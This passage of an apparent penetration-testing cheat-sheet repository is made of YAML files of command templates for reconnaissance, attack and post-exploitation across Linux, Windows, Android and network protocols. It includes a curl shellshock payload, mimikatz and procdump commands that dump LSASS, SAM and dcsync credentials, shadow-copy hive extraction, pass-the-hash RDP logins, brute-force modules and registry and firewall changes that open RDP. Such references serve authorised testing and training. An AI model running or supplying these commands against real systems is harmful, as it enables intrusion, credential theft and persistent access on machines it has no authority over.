279 | echo $ 280 | ``` 281 | 282 | Unset variable 283 | ``` 284 | unset 285 | ``` 286 | 287 | Write to file 288 | ``` 289 | echo > 290 | ``` 291 | 292 | Append content from a file to another file 293 | ``` 294 | cat >> 295 | ``` 296 | 297 | Add the amount of lines, words, and characters to file2-txt 298 | ``` 299 | cat | | cat > 300 | ``` 301 | 302 | Sort the content of a file (like cat) 303 | ``` 304 | sort 305 | ``` 306 | 307 | Save to sorted content to a new file 308 | ``` 309 | cat | sort > 310 | ``` 311 | 312 | Sort and remove duplicates and save to a new file 313 | ``` 314 | sort | uniq > 315 | ``` 316 | 317 | shellshock 318 | ``` 319 | curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" 320 | ``` 321 | -------------------------------------------------------------------------------- /files/Linux/misc.yaml: -------------------------------------------------------------------------------- 1 | name: QR code 2 | tags: [qr_code] 3 | data: | 4 | 5 | Create a QR code with some content 6 | plateform/linux #target/local #cat/UTILS 7 | 8 | ``` 9 | echo | curl -F-=\<- qrenco.de 10 | ``` 11 | 12 | json 13 | 14 | % json 15 | 16 | convert JSON to YAML 17 | plateform/linux #target/local #cat/UTILS 18 | ``` 19 | cat | ruby -ryaml -rjson -e 'puts YAML.dump(JSON.load(ARGF))' 20 | ``` 21 | 22 |  linux 23 | 24 | % misc, linux 25 | 26 | Convert multi line to one line 27 | plateform/linux #target/local #cat/UTILS 28 | ``` 29 | grep | tr '\n' ' ' 30 | ``` 31 | 32 | grep nmap protocol from file and get ips in one line 33 | plateform/linux #target/local #cat/UTILS 34 | ``` 35 | grep .gnmap|cut -d ' ' -f 2 | tr '\n' ' ' 36 | ``` 37 | 38 | % scanner 39 | 40 | find service on port 41 | plateform/linux #target/remote #cat/RECON 42 | ``` 43 | amap -d 44 | ``` 45 | 46 | -------------------------------------------------------------------------------- /files/Linux/sed.yaml: -------------------------------------------------------------------------------- 1 | name: sed 2 | tags: [sed] 3 | data: | 4 | 5 | change multiple space to one 6 | plateform/linux #target/local #cat/UTILS 7 | ``` 8 | sed 's/ */ /g' 9 | ``` 10 | 11 | delete the last char 12 | plateform/linux #target/local #cat/UTILS 13 | ``` 14 | sed 's/.$//g' 15 | ``` 16 | -------------------------------------------------------------------------------- /files/Metsaploit/msf.yaml: -------------------------------------------------------------------------------- 1 | name: MSF 2 | tags: [metasploit] 3 | data: | 4 | 5 | upgrade session to meterpreter 6 | plateform/linux #target/remote #cat/ATTACK/CONNECT 7 | ``` 8 | sessions -u 9 | ``` 10 | 11 | show session list 12 | plateform/linux #target/remote #cat/ATTACK/CONNECT 13 | ``` 14 | sessions -l 15 | ``` 16 | 17 | print route table 18 | plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 19 | ``` 20 | route print 21 | ``` 22 | 23 | add pivot 24 | plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 25 | ``` 26 | use multi/manage/autoroute 27 | ``` 28 | 29 | add socks proxy 30 | plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 31 | ``` 32 | use auxiliary/server/socks_proxy 33 | ``` 34 | -------------------------------------------------------------------------------- /files/Metsaploit/searchsploit.yaml: -------------------------------------------------------------------------------- 1 | name: Searchsploit 2 | tags: [searchsploit, exploit-db] 3 | data: | 4 | 5 | searchsploit mirror exploitDB id 6 | plateform/linux #target/local #cat/UTILS #cat/RECON 7 | ``` 8 | searchsploit -m 9 | ``` 10 | 11 | searchsploit show exploitDB id 12 | plateform/linux #target/local #cat/UTILS #cat/RECON 13 | ``` 14 | searchsploit -x 15 | ``` 16 | -------------------------------------------------------------------------------- /files/Mobile/Android/android.yaml: -------------------------------------------------------------------------------- 1 | name: Android Debug Bridge (adb) 2 | tags: [android, device, adb, bridge] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/ANDROID 6 | 7 | Get property 8 | adb -s shell getprop 9 | 10 | Install APK 11 | adb -s install -r 12 | 13 | Uninstall package 14 | adb -s uninstall -r 15 | 16 | Clear user data for package 17 | adb -s shell pm clear 18 | 19 | Dispatch a deep-link / open URI 20 | adb -s shell am start 21 | 22 | Download apk 23 | adb pull "$(adb shell pm path "$(adb shell pm list packages | grep | cut -d : -f 2)" | cut -d : -f 2)" . 24 | 25 | Sign apk with Uber-apk-signer 26 | java -jar uber-apk-signer-1.1.0.jar -a -------------------------------------------------------------------------------- /files/Mobile/Android/apktool.yaml: -------------------------------------------------------------------------------- 1 | name: apktool 2 | tags: [android, reverse, jadx] 3 | data: | 4 | plateform/linux #target/local #cat/ANDROID 5 | Decompress an app 6 | apktool d 7 | 8 | 9 | Build an app 10 | apktool b 11 | -------------------------------------------------------------------------------- /files/Mobile/Android/jadx.yaml: -------------------------------------------------------------------------------- 1 | name: Jadx 2 | tags: [android, reverse, jadx] 3 | data: | 4 | plateform/linux #target/local #cat/ANDROID 5 | Decompile an app 6 | jadx -d "$(pwd)/out" "$(pwd)/" 7 | 8 | 9 | -------------------------------------------------------------------------------- /files/Mobile/Android/objection.yaml: -------------------------------------------------------------------------------- 1 | name: Objection 2 | tags: [objection, android, ios, frida,] 3 | data: | 4 | plateform/linux #target/local #cat/ANDROID 5 | Patch the app 6 | ``` 7 | objection patchapk -s 8 | ``` 9 | 10 | Patch the app without resource decoding 11 | ``` 12 | objection patchapk -D -s 13 | ``` 14 | 15 | Patch the app with debug flag 16 | ``` 17 | objection patchapk -d -s 18 | ``` 19 | 20 | Launch explore 21 | ``` 22 | objection explore 23 | ``` 24 | 25 | Launch explore with startup command 26 | 27 | ``` 28 | objection explore -s 29 | ``` 30 | 31 | Launch explore without default ssl pinning bypass 32 | 33 | ``` 34 | objection explore -s "android sslpinning disable" 35 | ``` 36 | 37 | Launch explore with startup script 38 | 39 | ``` 40 | objection explore -S 41 | ``` -------------------------------------------------------------------------------- /files/Network/network.yaml: -------------------------------------------------------------------------------- 1 | name: network 2 | tags: [network, ip] 3 | data: | 4 | 5 | ip infos (hostname / city / country / isp ) 6 | plateform/linux #target/remote #cat/UTILS 7 | ``` 8 | curl https://ipinfo.io/ 9 | ``` 10 | 11 | what is my ip 12 | plateform/linux #target/remote #cat/UTILS 13 | ``` 14 | curl https://ipinfo.io/ 15 | ``` 16 | 17 | what is my ip - plaintext 18 | plateform/linux #target/remote #cat/UTILS 19 | ``` 20 | curl https://ipecho.net/plain/ 21 | ``` 22 | 23 | % network, portquiz 24 | 25 | test an internet port out allow - curl (no 445) 26 | plateform/linux #target/remote #cat/UTILS 27 | ``` 28 | curl portquiz.net: 29 | ``` 30 | 31 | test an internet port out allow - nc (no 445) 32 | plateform/linux #target/remote #cat/UTILS 33 | ``` 34 | nc -v portquiz.net 35 | ``` 36 | -------------------------------------------------------------------------------- /files/New/test.yml: -------------------------------------------------------------------------------- 1 | # Test -------------------------------------------------------------------------------- /files/Password cracking/crackfiles.yaml: -------------------------------------------------------------------------------- 1 | name: Crack files 2 | tags: [bruteforce, crack, files] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CRACKING/PASSWORD 6 | 7 | ZIP - fcrackzip 8 | ``` 9 | fcrackzip -u -D -p .zip 10 | ``` 11 | 12 | ZIP - john 13 | ``` 14 | zip2john .zip > zip.john; 15 | john zip.john 16 | ``` 17 | 18 | 7z - 7za 19 | ``` 20 | cat | 7za t .7z 21 | ``` 22 | 23 | 7z - john 24 | ``` 25 | ./7z2john.pl .7z > 7zhash.john; 26 | john 7zhash.john 27 | ``` 28 | 29 | PDF - pdfcrack 30 | ``` 31 | pdfcrack .pdf -w 32 | ``` 33 | 34 | PDF decrypt - qpdf 35 | ``` 36 | qpdf --password= --decrypt .pdf .pdf 37 | ``` 38 | 39 | = wordlist: /usr/share/wordlists/rockyou.txt 40 | -------------------------------------------------------------------------------- /files/Password cracking/hashcat.yaml: -------------------------------------------------------------------------------- 1 | name: hashcat 2 | tags: [password recovery, password cracking] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CRACKING/PASSWORD 6 | 7 | hashcat - basic md5 (joomla/wordpress) - wordlist 8 | ``` 9 | hashcat -a 0 -m 400 hashes 10 | ``` 11 | 12 | hashcat - basic md5 (joomla/wordpress) - wordlist with rules 13 | ``` 14 | hashcat -a 0 -m 400 hashes -r /usr/share/doc/hashcat/rules/best64.rule 15 | ``` 16 | 17 | hashcat - kerberos ticket (after kerberoasting) 18 | ``` 19 | hashcat -m 13100 --force -a 0 hashes 20 | ``` 21 | 22 | hashcat - LM 23 | ``` 24 | hashcat -m 3000 -a 0 hashes 25 | ``` 26 | 27 | hashcat - NTLM 28 | ``` 29 | hashcat -m 1000 -a 0 hashes 30 | ``` 31 | 32 | hashcat - NTLMv1 33 | ``` 34 | hashcat -m 5500 -a 0 hashes 35 | ``` 36 | 37 | hashcat - NTLMv2 38 | ``` 39 | hashcat -m 5600 -a 0 hashes 40 | ``` 41 | 42 | = wordlist: /usr/share/wordlist/rockyou.lst 43 | -------------------------------------------------------------------------------- /files/Password cracking/john.yaml: -------------------------------------------------------------------------------- 1 | name: john the ripper 2 | tags: [password recovery, password cracking] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CRACKING/PASSWORD 6 | 7 | john LM 8 | ``` 9 | john --wordlist= --format=lm hash.txt 10 | ``` 11 | 12 | john NTLM 13 | ``` 14 | john --wordlist= --format=nt hash.txt 15 | ``` 16 | 17 | john NTLMv1 18 | ``` 19 | john --wordlist= --format=netntlm hash.txt 20 | ``` 21 | 22 | john NTLMv2 23 | ``` 24 | john --wordlist= --format=netntlmv2 hash.txt 25 | ``` 26 | 27 | 28 | = wordlist: /usr/share/wordlist/rockyou.lst 29 | -------------------------------------------------------------------------------- /files/Password extraction/lazagne.yaml: -------------------------------------------------------------------------------- 1 | name: Lazagne 2 | tags: [lazagne, dump password] 3 | data: | 4 | 5 | lazagne dump all passwords (trig av) 6 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 7 | 8 | ``` 9 | lazagne.exe all 10 | ``` 11 | -------------------------------------------------------------------------------- /files/Password extraction/mimikatz.yaml: -------------------------------------------------------------------------------- 1 | name: mimikatz 2 | tags: [mimikatz, passwords] 3 | data: | 4 | 5 | mimikatz onliner 6 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 7 | ``` 8 | mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit" 9 | ``` 10 | 11 | mimikatz dcsync - user (krbtgt/Administrator) 12 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 13 | ``` 14 | mimikatz.exe "privilege::debug" "lsadump::dcsync /domain: /user:" "exit" 15 | ``` 16 | 17 | mimikatz extract credentials from dump 18 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 19 | ``` 20 | mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit" 21 | ``` 22 | 23 | mimikatz extract credentials from shadow copy (1) 24 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 25 | ``` 26 | mimikatz.exe "lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" 27 | ``` 28 | 29 | mimikatz extract credentials from shadow copy (2) 30 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 31 | 32 | Extract old passwords 33 | ``` 34 | mimikatz.exe "lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY" 35 | ``` 36 | 37 | # extract on hand shadow volume copy 38 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 39 | ``` 40 | powershell.exe "[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', '.\Desktop\SYSTEM.bkp');[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY', '.\Desktop\SECURITY.bkp');[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', '.\Desktop\SAM.bkp')" 41 | ``` 42 | -------------------------------------------------------------------------------- /files/Password extraction/procdump.yaml: -------------------------------------------------------------------------------- 1 | name: procdump 2 | tags: [procdump, lsass, credentials] 3 | data: | 4 | 5 | procdump - dump lsass - local 6 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 7 | ```cmd 8 | C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp 9 | ``` 10 | 11 | procdump - dump lsass - remote 12 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 13 | ```cmd 14 | net use Z: https://live.sysinternals.com; Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp 15 | ``` 16 | 17 | 18 | 19 | procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp 20 | 21 | procdump.exe -accepteula -ma C:\Windows\Temp\lsass.dmp -------------------------------------------------------------------------------- /files/Protocol/dns.yaml: -------------------------------------------------------------------------------- 1 | name: DNS 2 | tags: [dns, host, 53] 3 | data: | 4 | 5 | host find name server 6 | plateform/linux #target/remote #cat/RECON 7 | ``` 8 | host -t ns 9 | ``` 10 | 11 | host find mail server 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | host -t mx 15 | ``` 16 | 17 | % dns, dig, 53 18 | 19 | dig dns lookup 20 | plateform/linux #target/remote #cat/RECON 21 | ``` 22 | dig @1.1.1.1 23 | ``` 24 | 25 | dig any information 26 | plateform/linux #target/remote #cat/RECON 27 | ``` 28 | dig ANY @ 29 | ``` 30 | 31 | dig reverse lookup 32 | plateform/linux #target/remote #cat/RECON 33 | ``` 34 | dig -x @ 35 | ``` 36 | 37 | dig zone transfert 38 | plateform/linux #target/remote #cat/RECON 39 | ``` 40 | dig axfr @ 41 | ``` 42 | 43 | dig, find external, public IP address 44 | plateform/linux #target/remote #cat/RECON 45 | ``` 46 | dig +short @resolver1.opendns.com 47 | ``` 48 | 49 | dig, find domains file ip addresse value 50 | plateform/linux #target/remote #cat/RECON 51 | ``` 52 | dig -f +noall +answer 53 | ``` 54 | 55 | dig, find domains file MX ip record 56 | plateform/linux #target/remote #cat/RECON 57 | ``` 58 | dig -f MX +noall +answer 59 | ``` 60 | 61 | % dns, dnsrecon, 53 62 | 63 | dnsrecon standard enum on domain 64 | plateform/linux #target/remote #cat/RECON 65 | ``` 66 | dnsrecon -d 67 | ``` 68 | 69 | dnsrecon zone transfert 70 | plateform/linux #target/remote #cat/RECON 71 | ``` 72 | dnsrecon -d -t axfr 73 | ``` 74 | 75 | dnsrecon reverse lookup start/end ip 76 | plateform/linux #target/remote #cat/RECON 77 | ``` 78 | dnsrecon -r - -n 79 | ``` 80 | 81 | dnsrecon reverse lookup network range ip 82 | plateform/linux #target/remote #cat/RECON 83 | ``` 84 | dnsrecon -r -n 85 | ``` 86 | 87 | dnsrecon domain bruteforce 88 | plateform/linux #target/remote #cat/RECON 89 | ``` 90 | dnsrecon -d -D -t brt 91 | ``` 92 | 93 | % dns, dnsenum, 53 94 | plateform/linux #target/remote #cat/RECON 95 | ``` 96 | dnsenum 97 | ``` 98 | 99 | % dns, nmap, 53 100 | 101 | nmap grab banner 102 | plateform/linux #target/remote #cat/RECON 103 | ``` 104 | nmap -sV -p 53 --script dns-nsid 105 | ``` 106 | 107 | nmap dns tcp 108 | plateform/linux #target/remote #cat/RECON 109 | ``` 110 | nmap -n -sV --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 111 | ``` 112 | 113 | nmap dns udp 114 | plateform/linux #target/remote #cat/RECON 115 | ``` 116 | nmap -n -sV -sU --script ""(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 117 | ``` 118 | 119 | nmap activedirectory enum 120 | plateform/linux #target/remote #cat/RECON 121 | ``` 122 | nmap --script dns-srv-enum --script-args "dns-srv-enum.domain=''" 123 | ``` 124 | 125 | nmap dnssec 126 | plateform/linux #target/remote #cat/RECON 127 | ``` 128 | nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains= 129 | ``` 130 | 131 | % dns, msf, 53 132 | 133 | dns metasploit enumeration 134 | plateform/linux #target/remote #cat/RECON 135 | ``` 136 | msfconsole -x "use auxiliary/gather/enum_dns; set domain ; set ns ; exploit" 137 | ``` 138 | 139 | % dns, sublist3r , 53 140 | 141 | dns sublist3r - subdomain enumeration 142 | plateform/linux #target/remote #cat/RECON 143 | ``` 144 | sublist3r -d -v 145 | ``` 146 | 147 | dns sublist3r - subdomain enumeration with bruteforce module enabled 148 | plateform/linux #target/remote #cat/RECON 149 | ``` 150 | sublist3r -b -d 151 | ``` 152 | -------------------------------------------------------------------------------- /files/Protocol/ftp.yaml: -------------------------------------------------------------------------------- 1 | name: FTP 2 | tags: [ftp, 21] 3 | data: | 4 | plateform/linux #target/remote #port/21 #protocol/ftp 5 | 6 | ftp - download all 7 | cat/ATTACK/FILE_TRANSFERT 8 | ``` 9 | wget -m ftp://anonymous:anonymous@ 10 | ``` 11 | 12 | ftp download all (2) 13 | cat/ATTACK/FILE_TRANSFERT 14 | ``` 15 | wget -m --no-passive ftp://anonymous:anonymous@ 16 | ``` 17 | 18 | ftp - connect 19 | cat/ATTACK/CONNECT 20 | ``` 21 | ftp 22 | ``` 23 | 24 | ftp - connect port 25 | cat/ATTACK/CONNECT 26 | ``` 27 | ftp 28 | ``` 29 | 30 | ftp - enum anonym 31 | cat/ATTACK/CONNECT 32 | ``` 33 | nmap -v -p 21 --script=ftp-anon.nse 34 | ``` 35 | 36 | ftp - msf bruteforce login 37 | cat/ATTACK/BRUTEFORCE-SPRAY 38 | ``` 39 | msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS ; set USER_FILE ; set PASS_FILE ; exploit" 40 | ``` 41 | 42 | -------------------------------------------------------------------------------- /files/Protocol/ldap.yaml: -------------------------------------------------------------------------------- 1 | name: ldap 2 | tags: [ldap,ldapsearch] 3 | data: | 4 | 5 | ldap nmap 6 | cat/RECON 7 | ``` 8 | nmap -n -sV --script "ldap* and not brute" -p 389 9 | ``` 10 | 11 | ldapsearch base 12 | cat/ATTACK/CONNECT 13 | ``` 14 | ldapsearch -x -h -s base 15 | ``` 16 | 17 | ldapsearch with base dn 18 | cat/ATTACK/CONNECT 19 | ``` 20 | ldapsearch -x -h -b 21 | ``` 22 | 23 | ldapsearch base with authentication 24 | cat/ATTACK/CONNECT 25 | ``` 26 | ldapsearch -x -h -D \\ -w -b 'DC=,DC=' 27 | ``` 28 | 29 | ldapdomaindump 30 | cat/ATTACK/CONNECT 31 | ``` 32 | ldapdomaindump --no-json --no-grep --authtype SIMPLE -o ldap_dump -r -u \\ -p 33 | ``` -------------------------------------------------------------------------------- /files/Protocol/mssql.yaml: -------------------------------------------------------------------------------- 1 | name: msssql 2 | tags: [mssql, Microsoft SQL Server, 1433] 3 | data: | 4 | plateform/linux #target/remote #protocol/ldap #port/1433 5 | 6 | # mssql - connect 7 | cat/ATTACK/CONNECT 8 | ``` 9 | sqsh -S -U 10 | ``` 11 | 12 | mssql - enum 13 | cat/RECON 14 | ``` 15 | nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 16 | ``` 17 | 18 | mssql - enum sql login 19 | cat/ATTACK/BRUTEFORCE-SPRAY 20 | ``` 21 | msfconsole -x "use admin/mssql/mssql_enum_sql_logins; set RHOSTS ; set USER_FILE ; set PASS_FILE ; run" 22 | ``` 23 | 24 | mssql - enum configuration setting (xp-cmdshell) 25 | cat/RECON 26 | ``` 27 | msfconsole -x "use auxiliary/admin/mssql/mssql_enum; set RHOST ; set password ; run" 28 | ``` 29 | 30 | mssql link crawler 31 | cat/ATTACK/EXPLOIT 32 | ``` 33 | msfconsole -x "use exploit/windows/mssql/mssql_linkcrawler" 34 | ``` 35 | -------------------------------------------------------------------------------- /files/Protocol/mysql.yaml: -------------------------------------------------------------------------------- 1 | name: Mysql 2 | tags: [mysql, database, db, 3306] 3 | data: | 4 | plateform/linux #target/remote #protocol/mysql #port/3306 5 | connect 6 | cat/ATTACK/CONNECT 7 | ``` 8 | mysql -u -p -h 9 | ``` 10 | 11 | Create database 12 | cat/UTILS 13 | ``` 14 | mysql -u -p -e "create database character set UTF8mb4 collate utf8mb4_bin" 15 | ``` 16 | 17 | Export databse 18 | cat/UTILS 19 | ``` 20 | mysqldump -u -p > 21 | ``` 22 | 23 | Import database 24 | cat/UTILS 25 | ``` 26 | mysql -u -p 27 | ``` 28 | 29 | nmap - mysql enumeration 30 | cat/RECON 31 | ``` 32 | nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 33 | ``` 34 | -------------------------------------------------------------------------------- /files/Protocol/netbios.yaml: -------------------------------------------------------------------------------- 1 | name: netbios 2 | tags: [netbios, scan, nbtscan] 3 | data: | 4 | plateform/linux #target/remote #protocol/netbios 5 | nbtscan - netbios scan 6 | cat/RECON 7 | ``` 8 | nbtscan -r 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /files/Protocol/nfs.yaml: -------------------------------------------------------------------------------- 1 | name: nfs 2 | tags: [nfs, showmount, 2049] 3 | data: | 4 | plateform/linux #target/remote #protocol/nfs #port/2049 5 | 6 | nfs showmount 7 | cat/RECON 8 | ``` 9 | showmount -e 10 | ``` 11 | 12 | nfs - nmap showmount 13 | cat/RECON 14 | ``` 15 | nmap -sV --script=nfs-showmount 16 | ``` 17 | 18 | nfs - mount 19 | cat/ATTACK/CONNECT 20 | ``` 21 | mount -t nfs : -o nolock 22 | ``` 23 | 24 | nfs - mount with v2 (no authenrt=) 25 | cat/ATTACK/CONNECT 26 | ``` 27 | mount -t nfs -o vers=2 : -o nolock 28 | ``` 29 | -------------------------------------------------------------------------------- /files/Protocol/pop.yaml: -------------------------------------------------------------------------------- 1 | name: pop 2 | tags: [pop, pop3, 110, 995] 3 | data: | 4 | plateform/linux #target/remote #protocol/pop #port/110 #port/995 5 | 6 | nmap - pop3 infos 7 | cat/RECON 8 | ``` 9 | nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port 10 | ``` 11 | -------------------------------------------------------------------------------- /files/Protocol/postgres.yaml: -------------------------------------------------------------------------------- 1 | name: Postgres 2 | tags: [postgres, 5432, 5433] 3 | data: | 4 | plateform/linux #target/remote #protocol/postgres #port/5432 #port/5433 5 | 6 | postgres - connect 7 | cat/ATTACK/CONNECT 8 | ``` 9 | psql -h -U 10 | ``` 11 | 12 | postgres - connect database 13 | cat/ATTACK/CONNECT 14 | ``` 15 | psql -h -U -d 16 | ``` 17 | 18 | postgres - connect full options 19 | cat/ATTACK/CONNECT 20 | ``` 21 | psql -h -p -U -W 22 | ``` 23 | -------------------------------------------------------------------------------- /files/Protocol/rdp.yaml: -------------------------------------------------------------------------------- 1 | name: windows rdp 2 | tags: [rdp, windows, 3389] 3 | data: | 4 | plateform/windows #target/local #protocol/rdp #port/3389 5 | 6 | enable RDP 7 | cat/POSTEXPLOIT 8 | ``` 9 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 10 | ``` 11 | 12 | Add firewall authorisation RDP 13 | cat/POSTEXPLOIT 14 | ``` 15 | netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp 16 | ``` 17 | 18 | rdesktop 19 | % rdp, windows 20 | plateform/linux #target/remote #protocol/rdp #port/3389 #cat/ATTACK/CONNECT 21 | 22 | rdesktop - classic 23 | ``` 24 | rdesktop -g 90% -u -p -d 25 | ``` 26 | 27 | rdesktop - with share 28 | ``` 29 | rdesktop -g 90% -u -p -d -r disk:share= 30 | ``` 31 | 32 | xfreerdp 33 | 34 | % rdp, windows 35 | plateform/linux #target/remote #protocol/rdp #port/3389 #cat/ATTACK/CONNECT 36 | 37 | xfreerdp - classic 38 | ``` 39 | xfreerdp /u: /p: /d: /v: /size:1800x924 40 | ``` 41 | 42 | xfreerdp - with share 43 | ``` 44 | xfreerdp /u: /p: /d: /v: /size:1800x924 /drive:share, 45 | ``` 46 | 47 | xfreerdp - pass the hash 48 | ``` 49 | xfreerdp /u: /pth: /d: /v: 50 | ``` 51 | -------------------------------------------------------------------------------- /files/Protocol/smb/enum4linux.yaml: -------------------------------------------------------------------------------- 1 | name: enum4linux 2 | tags: [smb, samba] 3 | data: | 4 | 5 | plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON 6 | 7 | enum4linux - all except dictionnary based share name listing (default) 8 | ``` 9 | enum4linux -a 10 | ``` 11 | 12 | enum4linux - verbose 13 | ``` 14 | enum4linux -v 15 | ``` 16 | 17 | enum4linux - null access 18 | ``` 19 | enum4linux -u "" -p "" 20 | ``` 21 | 22 | enum4linux - guest access 23 | ``` 24 | enum4linux -u "guest" -p "" 25 | ``` 26 | 27 | enum4linux - with authentication 28 | ``` 29 | enum4linux -u -p 30 | ``` 31 | 32 | enum4linux - list Users 33 | ``` 34 | enum4linux -U |grep 'users:' 35 | ``` 36 | -------------------------------------------------------------------------------- /files/Protocol/smb/smb.yaml: -------------------------------------------------------------------------------- 1 | name: smb 2 | tags: [] 3 | data: | 4 | nbtscan - scan network looking for hosts 5 | plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON 6 | ``` 7 | nbtscan -r 8 | ``` 9 | 10 | smbclient with username and password 11 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 12 | ``` 13 | smbclient \\\\\\ -U "%" 14 | ``` 15 | 16 | smbclient sessions without password 17 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 18 | ``` 19 | smbclient \\\\\\ -U "%" 20 | ``` 21 | 22 | smbclient null session 23 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 24 | ``` 25 | smbclient \\\\\\ -U "%" 26 | ``` 27 | 28 | smb - find not signed smb 29 | plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON 30 | ``` 31 | nmap -Pn -sS -T4 --open --script smb-security-mode -p445 32 | ``` 33 | 34 | smb mount folder 35 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 36 | ``` 37 | mount -t cifs ///C\$ /tmp/mnttarget/ -o username= -o domain= 38 | ``` 39 | -------------------------------------------------------------------------------- /files/Protocol/smb/smbmap.yaml: -------------------------------------------------------------------------------- 1 | name: smbmap 2 | tags: [] 3 | data: | 4 | smbmap 5 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 6 | 7 | ``` 8 | smbmap -H -u "%" 9 | ``` 10 | 11 | smbmap - null access 12 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 13 | 14 | ``` 15 | smbmap -u "" -p "" -P 445 -H 16 | ``` 17 | 18 | smbmap - guest access 19 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 20 | ``` 21 | smbmap -u "guest" -p "" -P 445 -H 22 | ``` 23 | 24 | smbmap - list root of all shares 25 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 26 | ``` 27 | smbmap -H -u -p -d -r 28 | ``` 29 | 30 | smbmap - recursively list dirs, and files 31 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 32 | ``` 33 | smbmap -H -u -p -d -R --depth 1 34 | ``` 35 | 36 | = ip: 192.168.1.0/24 37 | -------------------------------------------------------------------------------- /files/Protocol/smtp.yaml: -------------------------------------------------------------------------------- 1 | name: SMTP 2 | tags: [smtp, 25] 3 | data: | 4 | plateform/linux #target/remote #protocol/smtp #port/25 5 | 6 | smtp nmap enumeration 7 | cat/RECON 8 | ``` 9 | nmap -p25 --script smtp-commands 10 | ``` 11 | 12 | smtp nmap ntlm information disclosure 13 | cat/RECON 14 | ``` 15 | nmap -p25 --script smtp-ntlm-info 16 | ``` 17 | 18 | nmap - smtp user enum 19 | cat/ATTACK/BRUTEFORCE-SPRAY 20 | ``` 21 | nmap –script smtp-enum-users.nse 22 | ``` 23 | 24 | smtp user enum 25 | cat/ATTACK/BRUTEFORCE-SPRAY 26 | ``` 27 | smtp-user-enum -M VRFY -U -t 28 | ``` 29 | 30 | msf - smtp user enum 31 | cat/ATTACK/BRUTEFORCE-SPRAY 32 | ``` 33 | msfconsole -x "use auxiliary/scanner/smtp/smtp_enum; set RHOSTS ; exploit" 34 | ``` 35 | -------------------------------------------------------------------------------- /files/Protocol/snmp.yaml: -------------------------------------------------------------------------------- 1 | name: snmp 2 | tags: [snmp, 161] 3 | data: | 4 | 5 | plateform/linux #target/remote #protocol/snmp #port/161 6 | 7 | nmap, snmp scan 8 | cat/RECON 9 | ``` 10 | nmap -sU --open -p 161 